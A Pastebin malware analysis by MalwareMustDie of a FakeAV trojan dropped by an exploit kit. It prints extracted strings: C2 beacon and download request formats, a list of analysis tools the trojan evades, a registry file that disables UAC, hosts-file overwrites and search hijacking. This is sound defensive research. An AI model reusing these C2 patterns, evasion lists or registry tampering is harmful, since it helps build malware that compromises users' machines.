SHARE
TWEET

#malwareMustDie - BHEK2 dropped FAkeAV Trojan 20121219

MalwareMustDie Dec 19th, 2012 324 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =======================================
  2. #malwareMustDie - BHEK2 dropped FAkeAV Trojan
  3. Reversing Analysis
  4. References: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/
  5. References: http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
  6. @unixfreaxjp ~]$ date
  7. Thu Dec 20 01:26:55 JST 2012
  8. =============================
  9.  
  10. Trojan sent parameter formats:
  11.  
  12. HTTP/1.1 GET hxxp://report.aaa.com/?I55520=%96%C7%A5%A2%D7%ABclj%98%D4i%9E%9Ffi%98m%A2gneg%C7%A8%D1%AE%99%97egh%A9%8B%E7%E5%AF%EB%A4%8D%85%5B%E8%9E%C9%A6jkmn%97%A1%A3%9Ck%D5%E4%9A%9B%8A%5B%A2%9B%94%AF%A9%A9%A3%A3%AAfmxf%ACx%9C%AFj%7Bzz%A2nmna%99%A4%9E%82iwwfa%A5%8B%E2%D4%E5%B1_eee%A3g%95%99eeef%A1eee%5E%93%9F%9Do%ABreb%60%A2%95%A1%B4%A7%98"
  13.  
  14. Where "report.aaa.com" was resolved in the IP in jotted in the malicious hosts file.
  15. After self copied and deletion, the trojan activities are reversed as followings:
  16.  
  17. // Registry aimed/coded to be searched...
  18.  
  19. SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform\
  20. SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform\
  21. Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
  22.  
  23.  
  24. // Detecting below software....
  25. // if softwares is detected the trojan won't run properly..
  26.  
  27. // filename....
  28. cv.exe
  29. irise.exe
  30. IrisSvc.exe
  31. wireshark.exe
  32. dumpcap.exe
  33. ZxSniffer.exe
  34. Aircrack-ng Gui.exe
  35. observer.exe
  36. tcpdump.exe
  37. WinDump.exe
  38. wspass.exe
  39. Regshot.exe
  40. ollydbg.exe
  41. PEBrowseDbg.exe
  42. windbg.exe
  43. DrvLoader.exe
  44. SymRecv.exe
  45. Syser.exe
  46. apis32.exe
  47. VBoxService.exe
  48. VBoxTray.exe
  49. SbieSvc.exe
  50. SbieCtrl.exe
  51. SandboxieRpcSs.exe
  52. SandboxieDcomLaunch.exe
  53. SUPERAntiSpyware.exe
  54. ERUNT.exe
  55. ERDNT.exe
  56. EtherD.exe
  57. Sniffer.exe
  58. CamtasiaStudio.exe
  59. CamRecorder.exe
  60. Software\CommView
  61. // registry...
  62. SYSTEM\CurrentControlSet\Services\IRIS5
  63. Software\eEye Digital Security
  64. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
  65. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
  66. SOFTWARE\ZxSniffer
  67. SOFTWARE\Cygwin
  68. SOFTWARE\Cygwin
  69. SOFTWARE\B Labs\Bopup Observer
  70. AppEvents\Schemes\Apps\Bopup Observer
  71. Software\B Labs\Bopup Observer
  72. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
  73. Software\Win Sniffer
  74. SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
  75. Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
  76. SYSTEM\CurrentControlSet\Services\SDbgMsg
  77. Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
  78. Software\Syser Soft
  79. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
  80. SOFTWARE\APIS32
  81. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
  82. SYSTEM\CurrentControlSet\Services\VBoxGuest
  83. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
  84. SYSTEM\CurrentControlSet\Services\SbieDrv
  85. Software\Classes\Folder\shell\sandbox
  86. Software\Classes\*\shell\sandbox
  87.  
  88.  
  89.  
  90. // This is what this software will put in...
  91. SOFTWARE\SUPERAntiSpyware.com
  92. SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
  93. SOFTWARE\SUPERAntiSpyware.com
  94. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
  95.  
  96. // Using DNSAPI.dll calls
  97. DnsFlushResolverCache
  98.  
  99. // Using orig WS2_32.dll
  100. WSAWaitForMultipleEvents
  101. WSACreateEvent
  102. WSAEventSelect
  103. WSACloseEvent
  104.  
  105. // WININET.dll
  106. DeleteUrlCacheEntryW
  107. InternetConnectA
  108. InternetQueryDataAvailable
  109. InternetReadFile
  110. HttpSendRequestW
  111. HttpOpenRequestA
  112. HttpAddRequestHeadersA
  113. InternetOpenA
  114. InternetCloseHandle
  115.  
  116. //iphlpapi.dll
  117. GetAdaptersInfo
  118.  
  119. // KERNEL32.dll
  120. eTime
  121. DeleteFileW
  122. CreateThread
  123. ExpandEnvironmentStringsW
  124. CreateFileA
  125. MoveFileExA
  126. GetFileAttributesA
  127. CreateDirectoryA
  128. SetFileAttributesA
  129. DeleteFileA
  130. FindFirstFileW
  131. GetVolumeInformationA
  132. GetVersionExW
  133. FindClose
  134. DeviceIoControl
  135. ExpandEnvironmentStringsA
  136. CopyFileA
  137. FindFirstFileA
  138. FindNextFileA
  139. WaitForSingleObjectEx
  140. lstrcatW
  141. GetTempFileNameW
  142. MoveFileExW
  143. WriteFile
  144. ReadFile
  145. CreateFileW
  146. GetTempPathW
  147. GetLocaleInfoA
  148. GetVolumeInformationW
  149. HeapAlloc
  150. HeapFree
  151. GetProcessHeap
  152. LocalAlloc
  153. CreateRemoteThread
  154. OpenProcess
  155. VirtualAllocEx
  156. ProcessIdToSessionId
  157. LocalFree
  158. WriteProcessMemory
  159. InterlockedDecrement
  160. SetEndOfFile
  161. GetFileSize
  162. SetFilePointer
  163. GetTickCount
  164.  
  165. // USER32.dll
  166. FindWindowA
  167. DispatchMessageW
  168. CreateDialogParamW
  169. ShowWindow
  170. EndDialog
  171. ReleaseDC
  172. MessageBoxA
  173. IsDialogMessageW
  174. TranslateMessage
  175. GetDC
  176. wsprintfW
  177. BeginPaint
  178. SendMessageA
  179. KillTimer
  180. PostQuitMessage
  181. GetMessageW
  182. SetTimer
  183. DestroyWindow
  184. EndPaint
  185. wsprintfA
  186.  
  187. // GDI32.dll
  188. GetObjectA
  189. GetObjectW
  190. CreateCompatibleBitmap
  191. CreateCompatibleDC
  192. SelectObject
  193. DeleteDC
  194. BitBlt
  195.  
  196. // ADVAPI32.dll
  197. RegSetValueExA
  198. RegQueryValueExA
  199. RegEnumKeyExA
  200. RegOpenKeyExA
  201. RegQueryInfoKeyA
  202. GetUserNameA
  203. RegCloseKey
  204. RegCreateKeyExW
  205. AllocateAndInitializeSid
  206. RegEnumValueW
  207. FreeSid
  208. CheckTokenMembership
  209. RegSetValueExW
  210. InitializeSecurityDescriptor
  211. SetSecurityDescriptorDacl
  212. RegCreateKeyExA
  213. InitializeAcl
  214. AddAccessAllowedAce
  215. RegEnumValueA
  216. SetFileSecurityA
  217. CreateServiceW
  218. CloseServiceHandle
  219. OpenSCManagerW
  220. StartServiceW
  221. RegQueryValueExW
  222. RegOpenKeyExW
  223.  
  224. // SHELL32.dll
  225. ShellExecuteW
  226. CommandLineToArgvW
  227. SHChangeNotify
  228.  
  229. //OLEAUT32.dll
  230. CoUninitialize
  231. CreateStreamOnHGlobal
  232. CoInitialize
  233. CoCreateInstance
  234. CoInitializeSecurity
  235. CoInitializeEx
  236. ole32.dll
  237.  
  238. // ntdll.dll
  239. NtConnectPort
  240. NtRequestWaitReplyPort
  241. RtlNtStatusToDosError
  242. NtClose
  243. NtDelayExecution
  244. NtCreateSection
  245. NtQuerySystemTime
  246.  
  247.  
  248. // urlmon.dll
  249. EnumProcesses
  250. GetProcessImageFileNameW
  251. PSAPI.DLL
  252. URLDownloadToFileW
  253.  
  254. // Data to be prepared & passed to server/C2
  255. Cache-Control:
  256. Connection:
  257. Date:
  258. Pragma:
  259. Transfer-Encoding:
  260. Upgrade:
  261. Via:
  262. Age:
  263. Location:
  264. Proxy-Authenticate:
  265. Public:
  266. Retry-After:
  267. Server:
  268. Vary:
  269. Warning:
  270. WWW-Authenticate:
  271. Content-Length:
  272. Transfer-Encoding:
  273.  
  274. ========================================
  275. First CNC comm structure (reversed code)
  276. ========================================
  277.  
  278. // The structure of the C2 URL DOWNLOAD....
  279. update%s.%s.com
  280.  
  281. // random seed chars...
  282. // + assembly of urls Pseudorandom...
  283.  
  284. abcdefghijklmnopqrstuvwxyz0123456789
  285. $%s&%s%s$
  286. ?%c%c=%s
  287.  
  288. // requested HTTP 1st download structure (begins w/ the user-agent)
  289.  
  290. Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
  291. GET
  292. Host: %s
  293.  
  294. ====================
  295. second comm
  296. ===================
  297. // how the encrypted info sent & its generator strings:
  298.  
  299. $%s&controller=sign&data=%s&mid=%s$
  300. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  301.  
  302. // here we go...
  303. GET %s?%s HTTP/1.1
  304. Host: %s
  305. User-Agent: %s
  306.  
  307. // accepted communication user-agent (marked the .NET)
  308. Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  309. Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  310.  
  311. // sending infected PC category
  312. POST %s HTTP/1.1
  313. Host: %s
  314. User-Agent: %s
  315. Content-Length: %d
  316. Content-Type: application/x-www-form-urlencoded
  317.  
  318.  
  319. // possibility checked OS + followed strings....
  320. wvNT
  321. wv2k
  322. wvME
  323. wvXP
  324. wv2k3
  325. wvVista
  326. wv2k8
  327. wvUnknown
  328.  
  329. // this could be version of OS..
  330. %.08X%.08X%.08X%.08X
  331. %.01d%.03d%.03d%.03d%.02d%.08X
  332. wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
  333.  
  334. //possibility domains structure:
  335. report.*
  336. *.com
  337. *.cfgbin
  338.  
  339.  
  340. // requested data
  341. HTTP/1.1
  342. GET
  343. Host: update1.randomstring.com <======= //noted this....
  344. User-Agent: IE7
  345. /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
  346. HTTP/1.1
  347. HEAD
  348. Host: update1.randomstring.com
  349. User-Agent: IE7
  350. <input type="hidden" name="%[^"]" value="%[^"] ">
  351. HTTP/1.1
  352. /update_c1eec.exe
  353. POST
  354. Host: update1.randomstring.com
  355. User-Agent: IE7
  356. /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
  357. HTTP/1.1
  358. GET
  359. Host: update1.randomstring.com
  360. User-Agent: IE7
  361. Data Buffer
  362. Build/13.0
  363. patch:0
  364. Version/10.0
  365. ver:2.0
  366. update/0
  367. Mod/0
  368. Service 1.0
  369. lib/5.0
  370. Library1.0
  371. App/7.0
  372. compat/0
  373. feed/7.1.0
  374. system:3.0
  375. control/5.0
  376. Engine/4.0
  377. runtime 11.0
  378. layout/2.0
  379. Build/14.0
  380. patch:10
  381. Version/11.0
  382. ver:3.0
  383. update/10
  384. Mod/3.0
  385. Service 2.0
  386. lib/6.0
  387. Library2.0
  388. App/8.0
  389. compat/4.1.0
  390. feed/7.2.0
  391. system:4.0
  392. control/6.0
  393. Engine/5.0
  394. runtime 12.0
  395. layout/3.0
  396. Build/15.0
  397. patch:20
  398. Version/12.0
  399. ver:4.0
  400. update/20
  401. Mod/4.0
  402. Service 3.0
  403. lib/7.0
  404. Library3.0
  405. App/9.0
  406. compat/4.2.0
  407. feed/7.3.0
  408. system:5.0
  409. control/7.0
  410. Engine/6.0
  411. runtime 13.0
  412. layout/4.0
  413. AppData
  414. \Mozilla\Firefox\Profiles\
  415. \prefs.js
  416. user_pref ( " general.useragent.extra.%[^"] " , " %[^"] " ) ;
  417. user_pref("general.useragent.extra.%s", "%s"); <=== // and this....
  418.  
  419. // FakeAlert To be stored path...
  420. %appdata%\ScanDisc.exe
  421. %appdata%
  422. %s\%X.reg
  423. %s\mcp.ico
  424.  
  425. // Making shortcuts...
  426. %s\mcp.ico
  427. shortcut
  428. shortcut
  429. My Computer
  430. .mcp
  431.  
  432. //registry to be written:
  433. Windows Registry Editor Version 5.00
  434. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
  435. "ConsentPromptBehaviorAdmin"=dword:0
  436. "ConsentPromptBehaviorUser"=dword:0
  437. "EnableLUA"=dword:0
  438. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
  439. "update"="%s"
  440. Error opening file
  441. Size of file: %ld bytes.
  442. DEFAULT_PCID
  443. Unknown__
  444. Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\
  445. SusClientId
  446. Unknown__
  447. Software\Microsoft\Windows NT\CurrentVersion\
  448. ProductId
  449. Unknown__
  450. Unknown__
  451.  
  452. // this is nasty.... son of the B'&%('&%( are grepping storage data...
  453. \\.\PhysicalDrive%d  
  454. \\.\PhysicalDrive%d
  455. \\.\PhysicalDrive%d
  456. \\.\IDE21201.VXD
  457. \\.\Scsi%d:
  458. SCSIDISK
  459. Drive%dModelNumber
  460. Drive%dSerialNumber
  461. Drive%dControllerRevisionNumber
  462. Drive%dControllerBufferSize
  463. Drive%dType
  464. Removable
  465. Fixed
  466. Unknown
  467. WD-W
  468. IBM-
  469. MAXTOR
  470. Maxtor
  471. WDC
  472. %02X%02X%02X%02X%02X%02X
  473. InstallDate
  474. Software\Microsoft\Windows NT\CurrentVersion
  475. InstallDate = %X
  476.  
  477. // overwrite the hosts file...
  478. C:\Windows\system32\drivers\etc\hosts
  479.  
  480. //seek online source for hosts info...
  481. google-analytics
  482. http://findgala.com/?&uid=%d&q={searchTerms}
  483.  
  484. // there goes thenew hosts structure wth new
  485. // %d.%d.%d.%d to be overwrite...
  486.  
  487. C:\Windows\system32\drivers\etc\hosts.txt
  488. # Copyright (c) 1993-2006 Microsoft Corp.
  489. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  490. # This file contains the mappings of IP addresses to host names. Each
  491. # entry should be kept on an individual line. The IP address should
  492. # be placed in the first column followed by the corresponding host name.
  493. # The IP address and the host name should be separated by at least one
  494. # space.
  495. # Additionally, comments (such as these) may be inserted on individual
  496. # lines or following the machine name denoted by a '#' symbol.
  497. # For example:
  498. #      102.54.94.97     rhino.acme.com          # source server
  499. #       38.25.63.10     x.acme.com              # x client host
  500. 127.0.0.1       localhost
  501. ::1             localhost
  502. # Copyright (c) 1993-2006 Microsoft Corp.
  503. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  504. # This file contains the mappings of IP addresses to host names. Each
  505. # entry should be kept on an individual line. The IP address should
  506. # be placed in the first column followed by the corresponding host name.
  507. # The IP address and the host name should be separated by at least one
  508. # space.
  509. # Additionally, comments (such as these) may be inserted on individual
  510. # lines or following the machine name denoted by a '#' symbol.
  511. # For example:
  512. #      102.54.94.97     rhino.acme.com          # source server
  513. #       38.25.63.10     x.acme.com              # x client host
  514. 127.0.0.1       localhost
  515. ::1             localhost
  516. %d.%d.%d.%d
  517.  
  518.  
  519. //Now making a mess with your IE search settings
  520.  
  521. \Software\Microsoft\Internet Explorer\SearchScopes
  522. DefaultScope
  523. URL
  524. \searchplugins\
  525. search.xml
  526. <ShortName>search</ShortName>
  527. <SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
  528. <Description>Search for the best price.</Description>
  529. <InputEncoding>windows-1251</InputEncoding>
  530. http://findgala.com/?
  531. <Url type="text/html" method="GET" template="%s">
  532. <Image width="16" height="16">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
  533. <Param name="q" value="{searchTerms}"/>
  534. <Param name="uid" value="%d"/>
  535. </Url>
  536. </SearchPlugin>
  537. search
  538. \prefs.js.bak
  539. browser.search.selectedEngine
  540. user_pref("browser.search.selectedEngine", "%s");
  541. user_pref("browser.search.selectedEngine", "%s");
  542. http://findgala.com/?&uid=%d&q={searchTerms}
  543. /chrome/report.html
  544. www.bing.com
  545.  
  546.  
  547. // Some uninstall info...
  548. Software\Microsoft\Windows\CurrentVersion\Uninstall
  549. SystemComponent
  550. ParentKeyName
  551. OperatingSystem
  552. DisplayName
  553.  
  554. // Additional on innstalled save data path...
  555.  
  556. c:\cgvi5r6i\vgdgfd.72g
  557. C:\file.exe
  558.  
  559.  
  560. ----
  561. #MalwareMustDie!!
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top